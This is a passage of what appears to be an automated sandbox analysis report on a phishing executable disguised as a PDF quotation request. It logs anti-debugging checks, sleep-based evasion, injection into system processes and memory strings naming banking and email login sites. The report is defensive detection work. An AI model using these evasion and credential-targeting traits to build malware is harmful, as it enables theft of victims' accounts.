                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7096E rdtsc 7_2_03C7096E
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeAPI coverage: 4.1 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe TID: 1876Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe TID: 1876Thread sleep time: -82000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe TID: 5528Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe TID: 5528Thread sleep time: -34500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E1C380 FindFirstFileW,FindNextFileW,FindClose,11_2_02E1C380
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,2_2_0040E500
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: Z9508-2L1.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: Z9508-2L1.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1300099287.0000000000A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Z9508-2L1.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: Z9508-2L1.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002B22000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: C:\Program Files (x86)\VMware Workstation\Fuxm8.exeFuxm8.exeC:\Program Files (x86)C:\Users\user~1\AppData\Local\Temp
                Source: Z9508-2L1.11.drBinary or memory string: discord.comVMware20,11696492231f
                Source: xvYhLzczmazJ.exe, 0000000C.00000002.3133251885.0000000000D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: firefox.exe, 00000010.00000002.2001992886.000002B5A880F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exe/
                Source: RMActivate_isv.exe, 0000000B.00000002.3130488624.0000000002BB8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: uC:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: Z9508-2L1.11.drBinary or memory string: global block list test formVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: Z9508-2L1.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Z9508-2L1.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1300099287.0000000000A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: Z9508-2L1.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: Z9508-2L1.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exe<
                Source: Z9508-2L1.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: firefox.exe, 00000010.00000002.2000496930.0000000028612000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: C:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: Z9508-2L1.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                Source: Z9508-2L1.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: Z9508-2L1.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: Z9508-2L1.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exej
                Source: firefox.exe, 00000010.00000002.2000496930.0000000028612000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: VMware Workstation
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeAPI call chain: ExitProcess graph end nodegraph_2-87629
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeAPI call chain: ExitProcess graph end nodegraph_2-86258
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7096E rdtsc 7_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417303 LdrLoadDll,7_2_00417303
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045A370 BlockInput,2_2_0045A370
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_0040D590
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress,2_2_0040EBD0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_03263508 mov eax, dword ptr fs:[00000030h]2_2_03263508
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_03263568 mov eax, dword ptr fs:[00000030h]2_2_03263568
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_03261EB8 mov eax, dword ptr fs:[00000030h]2_2_03261EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEC3CD mov eax, dword ptr fs:[00000030h]7_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB63C0 mov eax, dword ptr fs:[00000030h]7_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov eax, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov eax, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov eax, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD43D4 mov eax, dword ptr fs:[00000030h]7_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD43D4 mov eax, dword ptr fs:[00000030h]7_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C663FF mov eax, dword ptr fs:[00000030h]7_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E388 mov eax, dword ptr fs:[00000030h]7_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E388 mov eax, dword ptr fs:[00000030h]7_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E388 mov eax, dword ptr fs:[00000030h]7_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5438F mov eax, dword ptr fs:[00000030h]7_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5438F mov eax, dword ptr fs:[00000030h]7_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28397 mov eax, dword ptr fs:[00000030h]7_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28397 mov eax, dword ptr fs:[00000030h]7_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28397 mov eax, dword ptr fs:[00000030h]7_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov ecx, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFA352 mov eax, dword ptr fs:[00000030h]7_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD8350 mov ecx, dword ptr fs:[00000030h]7_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD437C mov eax, dword ptr fs:[00000030h]7_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A30B mov eax, dword ptr fs:[00000030h]7_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A30B mov eax, dword ptr fs:[00000030h]7_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A30B mov eax, dword ptr fs:[00000030h]7_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C310 mov ecx, dword ptr fs:[00000030h]7_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C50310 mov ecx, dword ptr fs:[00000030h]7_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402E1 mov eax, dword ptr fs:[00000030h]7_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402E1 mov eax, dword ptr fs:[00000030h]7_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402E1 mov eax, dword ptr fs:[00000030h]7_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E284 mov eax, dword ptr fs:[00000030h]7_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E284 mov eax, dword ptr fs:[00000030h]7_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0283 mov eax, dword ptr fs:[00000030h]7_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0283 mov eax, dword ptr fs:[00000030h]7_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0283 mov eax, dword ptr fs:[00000030h]7_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402A0 mov eax, dword ptr fs:[00000030h]7_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402A0 mov eax, dword ptr fs:[00000030h]7_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB8243 mov eax, dword ptr fs:[00000030h]7_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB8243 mov ecx, dword ptr fs:[00000030h]7_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A250 mov eax, dword ptr fs:[00000030h]7_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36259 mov eax, dword ptr fs:[00000030h]7_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEA250 mov eax, dword ptr fs:[00000030h]7_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEA250 mov eax, dword ptr fs:[00000030h]7_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34260 mov eax, dword ptr fs:[00000030h]7_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34260 mov eax, dword ptr fs:[00000030h]7_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34260 mov eax, dword ptr fs:[00000030h]7_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2826B mov eax, dword ptr fs:[00000030h]7_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2823B mov eax, dword ptr fs:[00000030h]7_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF61C3 mov eax, dword ptr fs:[00000030h]7_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF61C3 mov eax, dword ptr fs:[00000030h]7_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D061E5 mov eax, dword ptr fs:[00000030h]7_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C601F8 mov eax, dword ptr fs:[00000030h]7_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C70185 mov eax, dword ptr fs:[00000030h]7_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEC188 mov eax, dword ptr fs:[00000030h]7_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEC188 mov eax, dword ptr fs:[00000030h]7_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD4180 mov eax, dword ptr fs:[00000030h]7_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD4180 mov eax, dword ptr fs:[00000030h]7_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A197 mov eax, dword ptr fs:[00000030h]7_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A197 mov eax, dword ptr fs:[00000030h]7_2_03C2A197
